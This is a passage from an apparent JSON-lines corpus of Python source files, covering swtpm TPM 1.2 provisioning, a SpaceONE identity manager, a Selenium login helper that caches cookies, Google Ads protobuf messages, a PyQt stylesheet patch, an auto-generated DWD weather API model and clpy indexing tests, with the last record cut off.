TPM_PhysicalSetDeactivated \"\"\"\n\n fmt = \">HI I B\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt),\n TPM_ORD_PHYSICAL_SET_DEACTIVATED,\n state)\n\n _, ret = self.transfer(req, \"TPM_PhysiclaSetDaectivated\")\n return ret\n\n def run_swtpm_bios(self):\n \"\"\" Initialize the swtpm \"\"\"\n\n if self.startup(TPM_ST_CLEAR) or \\\n self.tsc_physicalpresence(TPM_PHYSICAL_PRESENCE_CMD_ENABLE) or \\\n self.tsc_physicalpresence(TPM_PHYSICAL_PRESENCE_PRESENT) or \\\n self.physical_enable() or \\\n self.physical_set_deactivated(0):\n return 1\n return 0\n\n def create_endorsement_key_pair(self):\n \"\"\" Create an endorsement key for the TPM 1.2 \"\"\"\n\n req = b'\\x00\\xc1\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x78\\x38\\xf0\\x30\\x81\\x07\\x2b' \\\n b'\\x0c\\xa9\\x10\\x98\\x08\\xc0\\x4B\\x05\\x11\\xc9\\x50\\x23\\x52\\xc4\\x00\\x00' \\\n b'\\x00\\x01\\x00\\x03\\x00\\x02\\x00\\x00\\x00\\x0c\\x00\\x00\\x08\\x00\\x00\\x00' \\\n b'\\x00\\x02\\x00\\x00\\x00\\x00'\n\n rsp, ret = self.transfer(req, \"TPM_CreateEndorsementKeyPair\")\n if ret != 0:\n return b'', 1\n\n length = struct.unpack(\">I\", rsp[34:38])[0]\n if length != 256:\n logerr(self.logfile, \"Offset to EK Public key is wrong.\\n\")\n return b'', 1\n\n pubek = struct.unpack(\"256s\", rsp[38:38+256])[0]\n\n return pubek, 0\n\n def oiap(self):\n \"\"\" Create an OIAP session \"\"\"\n\n fmt = \">HII\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_OIAP)\n\n rsp, ret = self.transfer(req, \"TPM_OIAP\")\n if ret != 0:\n return b'', 0, 1\n\n authhandle = struct.unpack(\">I\", rsp[10:14])[0]\n nonce_even = struct.unpack(\"20s\", rsp[14:34])[0]\n\n return nonce_even, authhandle, 0\n\n def take_ownership(self, ownerpass_digest, srkpass_digest, pubek):\n \"\"\" Run TPM_TakeOwernship \"\"\"\n\n exponent = int('10001', 16)\n modulus = int(pubek.hex(), 16)\n pubekkey = RSAPublicNumbers(exponent, modulus).public_key(backend=default_backend())\n\n oaep = padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=\"TCPA\".encode()\n )\n enc_owner_auth = pubekkey.encrypt(ownerpass_digest, oaep)\n enc_srk_auth = pubekkey.encrypt(srkpass_digest, oaep)\n\n nonce_even, auth_handle, ret = self.oiap()\n if ret != 0:\n return 1\n\n tpm_rsa_key_parms = struct.pack(\">III\",\n 2048, # keyLength\n 2, # numPrimes\n 0) # exponentSize\n tpm_key_parms = struct.pack(\">I HH I%ds\" % (len(tpm_rsa_key_parms)),\n TPM_ALG_RSA, # algorithmId\n TPM_ES_RSAESOAEP_SHA1_MGF1, # encScheme\n TPM_SS_NONE, # sigScheme\n len(tpm_rsa_key_parms), tpm_rsa_key_parms)\n tpm_key12 = struct.pack(\">HH HIB %ds I I I\" %\n (len(tpm_key_parms)),\n TPM_TAG_KEY12, 0,\n TPM_KEY_STORAGE, # keyUsage\n 0, # keyFlags\n TPM_AUTH_ALWAYS, # authDataUsage\n tpm_key_parms,\n 0,\n 0,\n 0)\n fmt_auth = \">I20sB20s\"\n fmt = \">HII H I256s I256s %ds\" % len(tpm_key12)\n nonce_odd = os.urandom(20)\n req = struct.pack(fmt,\n TPM_TAG_RQU_AUTH1_COMMAND,\n struct.calcsize(fmt) + struct.calcsize(fmt_auth),\n TPM_ORD_TAKE_OWNERSHIP,\n TPM_PID_OWNER,\n len(enc_owner_auth), enc_owner_auth,\n len(enc_srk_auth), enc_srk_auth,\n tpm_key12)\n # req needs authhandle, nonceodd & ownerAuth appended\n shainput = struct.unpack(\"%ds\" % (len(req) - 6), req[6:len(req)])[0]\n in_param_digest = sha1(shainput)\n\n continue_auth_session = 0\n in_auth_setup_params = struct.pack(\">20s20sB\", nonce_even, nonce_odd, continue_auth_session)\n macinput = struct.pack(\">20s %ds\" % len(in_auth_setup_params),\n in_param_digest, in_auth_setup_params)\n myhmac = hmac.HMAC(ownerpass_digest, hashes.SHA1(), backend=default_backend())\n myhmac.update(macinput)\n owner_auth = myhmac.finalize()\n\n req += struct.pack(fmt_auth, auth_handle, nonce_odd, continue_auth_session, owner_auth)\n\n _, ret = self.transfer(req, \"TPM_TakeOwnership\")\n return ret\n\n def ownerclear(self, ownerpass_digest):\n \"\"\" clear TPM ownership \"\"\"\n\n nonce_even, auth_handle, ret = self.oiap()\n if ret != 0:\n return 1\n\n nonce_odd = os.urandom(20)\n\n fmt_auth = \">I20sB20s\"\n fmt = \">H II\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_AUTH1_COMMAND,\n struct.calcsize(fmt) + struct.calcsize(fmt_auth), TPM_ORD_OWNER_CLEAR)\n\n shainput = struct.unpack(\"%ds\" % (len(req) - 6), req[6:len(req)])[0]\n in_param_digest = sha1(shainput)\n\n continue_auth_session = 0\n in_auth_setup_params = struct.pack(\">20s20sB\", nonce_even, nonce_odd, continue_auth_session)\n macinput = struct.pack(\">20s %ds\" % len(in_auth_setup_params),\n in_param_digest, in_auth_setup_params)\n myhmac = hmac.HMAC(ownerpass_digest, hashes.SHA1(), backend=default_backend())\n myhmac.update(macinput)\n owner_auth = myhmac.finalize()\n\n req += struct.pack(fmt_auth, auth_handle, nonce_odd, continue_auth_session, owner_auth)\n\n _, ret = self.transfer(req, \"TPM_ClearOwner\")\n return ret\n\n def nv_define_space(self, nvindex, nvindexattrs, size):\n \"\"\" Define an nvindex with the given permissions and size \"\"\"\n\n pcr_info_short = struct.pack(\">HBBB B 20s\",\n 3, 0, 0, 0,\n TPM_LOC_ALL,\n ('\\x00' * 20).encode())\n\n fmt = \">HI %ds%ds HI BBBI\" % (len(pcr_info_short), len(pcr_info_short))\n nv_data_public = struct.pack(fmt,\n TPM_TAG_NV_DATA_PUBLIC, nvindex,\n pcr_info_short, pcr_info_short,\n TPM_TAG_NV_ATTRIBUTES, nvindexattrs,\n 0, 0, 0, size)\n fmt = \">HII %ds 20s\" % len(nv_data_public)\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_NV_DEFINE_SPACE,\n nv_data_public,\n ('\\x00' * 20).encode())\n _, ret = self.transfer(req, \"TPM_NV_DefineSpace\")\n return ret\n\n def nv_write_value(self, nvindex, data):\n \"\"\" Write data to an index \"\"\"\n\n fmt = \">HII III%ds\" % len(data)\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_NV_WRITE_VALUE,\n nvindex, 0, len(data), data)\n _, ret = self.transfer(req, \"TPM_NV_WriteValue\")\n return ret\n\n def write_ek_cert_nvram(self, data):\n \"\"\" Write the EK Certificate into NVRAM \"\"\"\n\n nvindex = TPM_NV_INDEX_EKCERT|TPM_NV_INDEX_D_BIT\n ret = self.nv_define_space(nvindex, TPM_NV_PER_OWNERREAD|TPM_NV_PER_OWNERWRITE, len(data))\n if ret != 0:\n return 1\n\n ret = self.nv_write_value(nvindex, data)\n if ret != 0:\n return 1\n\n return 0\n\n def write_platform_cert_nvram(self, data):\n \"\"\" Write the Platform Certificate into NVRAM \"\"\"\n\n nvindex = TPM_NV_INDEX_PLATFORMCERT|TPM_NV_INDEX_D_BIT\n ret = self.nv_define_space(nvindex, TPM_NV_PER_OWNERREAD|TPM_NV_PER_OWNERWRITE, len(data))\n if ret != 0:\n return 1\n\n return self.nv_write_value(nvindex, data)\n\n def nv_lock(self):\n \"\"\" Lock the NVRAM \"\"\"\n\n return self.nv_define_space(TPM_NV_INDEX_LOCK, 0, 0)\n"} {"ext": "py", "sha": "1a3138de56d4b949e2c7c498e3ecc4e2e51a877d", "content": "import logging\n\nfrom spaceone.core.manager import BaseManager\nfrom spaceone.core.connector.space_connector import SpaceConnector\nfrom spaceone.core import cache\nfrom spaceone.cost_analysis.error import *\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass IdentityManager(BaseManager):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.identity_connector: SpaceConnector = self.locator.get_connector('SpaceConnector', service='identity')\n\n def list_projects(self, query, domain_id):\n return self.identity_connector.dispatch('Project.list', {'query': query, 'domain_id': domain_id})\n\n def get_project(self, project_id, domain_id):\n return self.identity_connector.dispatch('Project.get', {'project_id': project_id, 'domain_id': domain_id})\n\n def list_project_groups(self, query, domain_id):\n return self.identity_connector.dispatch('ProjectGroup.list', {'query': query, 'domain_id': domain_id})\n\n def get_project_group(self, project_group_id, domain_id):\n return self.identity_connector.dispatch('ProjectGroup.get', {'project_group_id': project_group_id,\n 'domain_id': domain_id})\n\n def list_projects_in_project_group(self, project_group_id, domain_id, recursive=False, query=None):\n request = {\n 'project_group_id': project_group_id,\n 'domain_id': domain_id,\n 'recursive': recursive\n }\n\n if query:\n request['query'] = query\n\n return self.identity_connector.dispatch('ProjectGroup.list_projects', request)\n\n def get_service_account(self, service_account_id, domain_id):\n return self.identity_connector.dispatch('ServiceAccount.get', {'service_account_id': service_account_id,\n 'domain_id': domain_id})\n\n def list_service_accounts(self, query, domain_id):\n return self.identity_connector.dispatch('ServiceAccount.list', {'query': query, 'domain_id': domain_id})\n"} {"ext": "py", "sha": "1a31390df8157aa287258bfabdd4571c504538bf", "content": "# -*- coding: utf-8 -*-\n# @Time : 2019-02-25 09:53\n# @Author : EchoShoot\n# @Email : BiarFordlander@gmail.com\n# @URL : https://github.com/EchoShoot\n# @File : Login.py\n# @Explain : 整合登录逻辑\n\nimport logging\nimport shelve\nimport time\nfrom selenium import webdriver\nfrom SmartLogin import finder\nfrom SmartLogin import monitor\nfrom SmartLogin import Errors\n\nlogger = logging.getLogger(__name__)\n\n\n# logger.disabled = True\n\nclass Login(object):\n def __init__(self, login_url, target_page, driver=None):\n self.login_page = login_url # 登录地址\n self.target_page = target_page # 目标地址\n self.cookie_db = shelve.open('Cookie', writeback=True) # 存储Cookie\n self.driver = driver\n if self.driver is None:\n from pkg_resources import resource_filename, Requirement\n driverpath = resource_filename(Requirement.parse('SmartLogin'), 'SmartLogin/resource/chromedriver')\n logger.info(\"use default chrome driver from path: {}\".format(driverpath))\n self.driver = webdriver.Chrome(driverpath)\n\n def auto_login(self, username, password, click_xpath=None, update=False):\n \"\"\" 自动登录到页面, 如果页面存在登录记录, 则跳过登录过程. \"\"\"\n cookies = self.cookie_db.get(self.login_page, None) # 提取 cookie\n if update or cookies is None: # 如果 cookie 不存在\n cookies = self.login(username, password, click_xpath) # 模拟登录来获取 cookie\n self.cookie_db[self.login_page] = cookies # 存入 cookie\n else:\n # 一定是先访问网页,才能添加 Cookie 不报错\n self.driver.get(self.target_page)\n self.driver.delete_all_cookies() # 清空 Cookie 排除干扰\n for cookie in cookies:\n cookie.pop('expiry', None) # 弹出过期时间,让所有 Cookie 不会过期\n self.driver.add_cookie(cookie)\n self.driver.refresh() # 刷新使得 Cookie 效果生效\n return cookies\n\n def login(self, username, password, click_xpath=None):\n \"\"\" 自动切换到登录框, 输入账号密码 \"\"\"\n try:\n finder.smart_get(self.driver, self.login_page, 30) # 限制跳转到某个网页的加载时间\n finder.auto_switch_to_LoginForm(self.driver) # 自动切换到有密码输入框的地方\n if click_xpath: # 有些网页需要点击一下才会切换到密码输入框\n self.driver.find_element_by_xpath(click_xpath).click()\n finder.fill_username_and_password(self.driver, username, password) # 输入账号密码\n monitor.until_login_page_switch(self.driver) # 等待页面发生跳转\n cookies = self.driver.get_cookies() # 获取 Cookie 的操作\n except Errors.NoSuchWindowException as e:\n raise Errors.BrowsersMayClosed(\"浏览器可能被关闭了.\") from e\n else:\n return cookies\n\n def close(self):\n self.cookie_db.close()\n self.driver.quit()\n\n\nif __name__ == '__main__':\n login = Login(\n target_page='https://i.qq.com',\n login_url='https://i.qq.com',\n )\n cookie = login.auto_login('username', 'password',\n click_xpath='//a[@id=\"switcher_plogin\"]', # 若登录前不需要点击某处可以赋值为None\n update=True)\n print('拦截到 Cookie: {}'.format(cookie))\n time.sleep(4) # 延迟4秒便于观察"} {"ext": "py", "sha": "1a313918b965ac86982ab93c6537411317e9b272", "content": "# from test import test\nfrom senti19.senti19.test import test_name\n\n# test.test_name()\n\n# Tests().test_print_name()"} {"ext": "py", "sha": "1a313aa0e9949cfc731f21228a3dabd743eebfd9", "content": "# -*- coding: utf-8 -*-\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport proto # type: ignore\n\nfrom google.ads.googleads.v8.resources.types import payments_account\n\n\n__protobuf__ = proto.module(\n package=\"google.ads.googleads.v8.services\",\n marshal=\"google.ads.googleads.v8\",\n manifest={\"ListPaymentsAccountsRequest\", \"ListPaymentsAccountsResponse\",},\n)\n\n\nclass ListPaymentsAccountsRequest(proto.Message):\n r\"\"\"Request message for fetching all accessible payments\n accounts.\n\n Attributes:\n customer_id (str):\n Required. The ID of the customer to apply the\n PaymentsAccount list operation to.\n \"\"\"\n\n customer_id = proto.Field(proto.STRING, number=1,)\n\n\nclass ListPaymentsAccountsResponse(proto.Message):\n r\"\"\"Response message for\n [PaymentsAccountService.ListPaymentsAccounts][google.ads.googleads.v8.services.PaymentsAccountService.ListPaymentsAccounts].\n\n Attributes:\n payments_accounts (Sequence[google.ads.googleads.v8.resources.types.PaymentsAccount]):\n The list of accessible payments accounts.\n \"\"\"\n\n payments_accounts = proto.RepeatedField(\n proto.MESSAGE, number=1, message=payments_account.PaymentsAccount,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n"} {"ext": "py", "sha": "1a313ac2eaaccddc98520dc5be17257f4fbe712c", "content": "\"\"\"This is used to patch the QApplication style sheet.\nIt reads the current stylesheet, appends our modifications and sets the new stylesheet.\n\"\"\"\n\nfrom PyQt5 import QtWidgets\n\n\ndef patch_qt_stylesheet(use_dark_theme: bool) -> None:\n if not use_dark_theme:\n return\n\n app = QtWidgets.QApplication.instance()\n\n style_sheet = app.styleSheet()\n style_sheet = style_sheet + '''\n /* PayToEdit text was being clipped */\n QAbstractScrollArea {\n padding: 0px;\n }\n /* In History tab, labels while edited were being clipped (Windows) */\n QAbstractItemView QLineEdit {\n padding: 0px;\n }\n '''\n app.setStyleSheet(style_sheet)\n"} {"ext": "py", "sha": "1a313c2bf66324aaa926e2f79e23257b013f52ea", "content": "\"\"\"\n Deutscher Wetterdienst: API\n\n Aktuelle Wetterdaten von allen Deutschen Wetterstationen # noqa: E501\n\n The version of the OpenAPI document: 1.0.0\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom deutschland.dwd.exceptions import ApiAttributeError\nfrom deutschland.dwd.model_utils import ApiTypeError # noqa: F401\nfrom deutschland.dwd.model_utils import (\n ModelComposed,\n ModelNormal,\n ModelSimple,\n cached_property,\n change_keys_js_to_python,\n convert_js_args_to_python_args,\n date,\n datetime,\n file_type,\n none_type,\n validate_get_composed_info,\n)\n\nfrom ..model_utils import OpenApiModel\n\n\nclass StationOverview10865Forecast2(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {}\n\n validations = {}\n\n @cached_property\n def additional_properties_type():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n \"\"\"\n return (\n bool,\n date,\n datetime,\n dict,\n float,\n int,\n list,\n str,\n none_type,\n ) # noqa: E501\n\n _nullable = False\n\n @cached_property\n def openapi_types():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n return {\n \"station_id\": (str,), # noqa: E501\n \"start\": (int,), # noqa: E501\n \"time_step\": (int,), # noqa: E501\n \"temperature\": ([float],), # noqa: E501\n \"temperature_std\": ([float],), # noqa: E501\n \"wind_speed\": (\n str,\n none_type,\n ), # noqa: E501\n \"wind_direction\": (\n str,\n none_type,\n ), # noqa: E501\n \"wind_gust\": (\n str,\n none_type,\n ), # noqa: E501\n \"icon\": ([int],), # noqa: E501\n \"precipitation_total\": ([int],), # noqa: E501\n \"precipitation_probablity\": (\n str,\n none_type,\n ), # noqa: E501\n \"precipitation_probablity_index\": (\n str,\n none_type,\n ), # noqa: E501\n }\n\n @cached_property\n def discriminator():\n return None\n\n attribute_map = {\n \"station_id\": \"stationId\", # noqa: E501\n \"start\": \"start\", # noqa: E501\n \"time_step\": \"timeStep\", # noqa: E501\n \"temperature\": \"temperature\", # noqa: E501\n \"temperature_std\": \"temperatureStd\", # noqa: E501\n \"wind_speed\": \"windSpeed\", # noqa: E501\n \"wind_direction\": \"windDirection\", # noqa: E501\n \"wind_gust\": \"windGust\", # noqa: E501\n \"icon\": \"icon\", # noqa: E501\n \"precipitation_total\": \"precipitationTotal\", # noqa: E501\n \"precipitation_probablity\": \"precipitationProbablity\", # noqa: E501\n \"precipitation_probablity_index\": \"precipitationProbablityIndex\", # noqa: E501\n }\n\n read_only_vars = {}\n\n _composed_schemas = {}\n\n @classmethod\n @convert_js_args_to_python_args\n def _from_openapi_data(cls, *args, **kwargs): # noqa: E501\n \"\"\"StationOverview10865Forecast2 - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n station_id (str): [optional] # noqa: E501\n start (int): [optional] # noqa: E501\n time_step (int): [optional] # noqa: E501\n temperature ([float]): [optional] # noqa: E501\n temperature_std ([float]): [optional] # noqa: E501\n wind_speed (str, none_type): [optional] # noqa: E501\n wind_direction (str, none_type): [optional] # noqa: E501\n wind_gust (str, none_type): [optional] # noqa: E501\n icon ([int]): [optional] # noqa: E501\n precipitation_total ([int]): [optional] # noqa: E501\n precipitation_probablity (str, none_type): [optional] # noqa: E501\n precipitation_probablity_index (str, none_type): [optional] # noqa: E501\n \"\"\"\n\n _check_type = kwargs.pop(\"_check_type\", True)\n _spec_property_naming = kwargs.pop(\"_spec_property_naming\", False)\n _path_to_item = kwargs.pop(\"_path_to_item\", ())\n _configuration = kwargs.pop(\"_configuration\", None)\n _visited_composed_classes = kwargs.pop(\"_visited_composed_classes\", ())\n\n self = super(OpenApiModel, cls).__new__(cls)\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\"\n % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n return self\n\n required_properties = set(\n [\n \"_data_store\",\n \"_check_type\",\n \"_spec_property_naming\",\n \"_path_to_item\",\n \"_configuration\",\n \"_visited_composed_classes\",\n ]\n )\n\n @convert_js_args_to_python_args\n def __init__(self, *args, **kwargs): # noqa: E501\n \"\"\"StationOverview10865Forecast2 - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n station_id (str): [optional] # noqa: E501\n start (int): [optional] # noqa: E501\n time_step (int): [optional] # noqa: E501\n temperature ([float]): [optional] # noqa: E501\n temperature_std ([float]): [optional] # noqa: E501\n wind_speed (str, none_type): [optional] # noqa: E501\n wind_direction (str, none_type): [optional] # noqa: E501\n wind_gust (str, none_type): [optional] # noqa: E501\n icon ([int]): [optional] # noqa: E501\n precipitation_total ([int]): [optional] # noqa: E501\n precipitation_probablity (str, none_type): [optional] # noqa: E501\n precipitation_probablity_index (str, none_type): [optional] # noqa: E501\n \"\"\"\n\n _check_type = kwargs.pop(\"_check_type\", True)\n _spec_property_naming = kwargs.pop(\"_spec_property_naming\", False)\n _path_to_item = kwargs.pop(\"_path_to_item\", ())\n _configuration = kwargs.pop(\"_configuration\", None)\n _visited_composed_classes = kwargs.pop(\"_visited_composed_classes\", ())\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\"\n % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n if var_name in self.read_only_vars:\n raise ApiAttributeError(\n f\"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate \"\n f\"class with read only attributes.\"\n )\n"} {"ext": "py", "sha": "1a313ca05b5deda64a1cca510515f2bd994f226c", "content": "import unittest\n\nfrom clpy import testing\n\n\n@testing.parameterize(\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': (1, 0, 2)},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': (-1, 0, -2)},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1), 'indexes': (1, 0, 2)},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1), 'indexes': (-1, 0, -2)},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(None), slice(None, 1), slice(2))},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(None), slice(None, -1), slice(-2))},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1),\n 'indexes': (slice(None), slice(None, 1), slice(2))},\n {'shape': (2, 3, 5), 'transpose': None,\n 'indexes': (slice(None, None, -1), slice(1, None, -1), slice(4, 1, -2))},\n {'shape': (2, 3, 5), 'transpose': (2, 0, 1),\n 'indexes': (slice(4, 1, -2), slice(None, None, -1), slice(1, None, -1))},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': (Ellipsis, 2)},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': (1, Ellipsis)},\n {'shape': (2, 3, 4, 5), 'transpose': None, 'indexes': (1, Ellipsis, 3)},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (1, None, slice(2), None, 2)},\n {'shape': (2, 3), 'transpose': None, 'indexes': (None,)},\n {'shape': (2,), 'transpose': None, 'indexes': (slice(None,), None)},\n {'shape': (), 'transpose': None, 'indexes': (None,)},\n {'shape': (), 'transpose': None, 'indexes': (None, None)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(10, -9, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-9, -10, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-1, -10, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-1, -11, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-11, -11, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(10, -9, -3),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-1, -11, -3),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(1, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(0, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-1, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-4, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-6, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-10, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-11, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-12, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, 1, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, 0, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -1, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -4, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -5, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -6, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -10, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -11, -1),)},\n {'shape': (10,), 'transpose': None, 'indexes': (slice(-5, -12, -1),)},\n # reversing indexing on empty dimension\n {'shape': (0,), 'transpose': None, 'indexes': (slice(None, None, -1),)},\n {'shape': (0, 0), 'transpose': None,\n 'indexes': (slice(None, None, -1), slice(None, None, -1))},\n {'shape': (0, 0), 'transpose': None,\n 'indexes': (None, slice(None, None, -1))},\n {'shape': (0, 0), 'transpose': None,\n 'indexes': (slice(None, None, -1), None)},\n {'shape': (0, 1), 'transpose': None,\n 'indexes': (slice(None, None, -1), None)},\n {'shape': (1, 0), 'transpose': None,\n 'indexes': (None, slice(None, None, -1))},\n {'shape': (1, 0, 1), 'transpose': None,\n 'indexes': (None, slice(None, None, -1), None)},\n #\n {'shape': (2, 0), 'transpose': None,\n 'indexes': (1, slice(None, None, None))},\n)\n@testing.gpu\nclass TestArrayIndexingParameterized(unittest.TestCase):\n\n _multiprocess_can_split_ = True\n\n @testing.for_all_dtypes()\n @testing.numpy_clpy_array_equal()\n def test_getitem(self, xp, dtype):\n a = testing.shaped_arange(self.shape, xp, dtype)\n if self.transpose:\n a = a.transpose(self.transpose)\n return a[self.indexes]\n\n\n@testing.parameterize(\n {'shape': (), 'transpose': None, 'indexes': 0},\n {'shape': (), 'transpose': None, 'indexes': (slice(0, 1, 0),)},\n {'shape': (2, 3), 'transpose': None, 'indexes': (0, 0, 0)},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': -3},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1), 'indexes': -5},\n {'shape': (2, 3, 4), 'transpose': None, 'indexes': 3},\n {'shape': (2, 3, 4), 'transpose': (2, 0, 1), 'indexes': 5},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(0, 1, 0), )},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice((0, 0), None, None), )},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(None, (0, 0), None), )},\n {'shape': (2, 3, 4), 'transpose': None,\n 'indexes': (slice(None, None, (0, 0)), 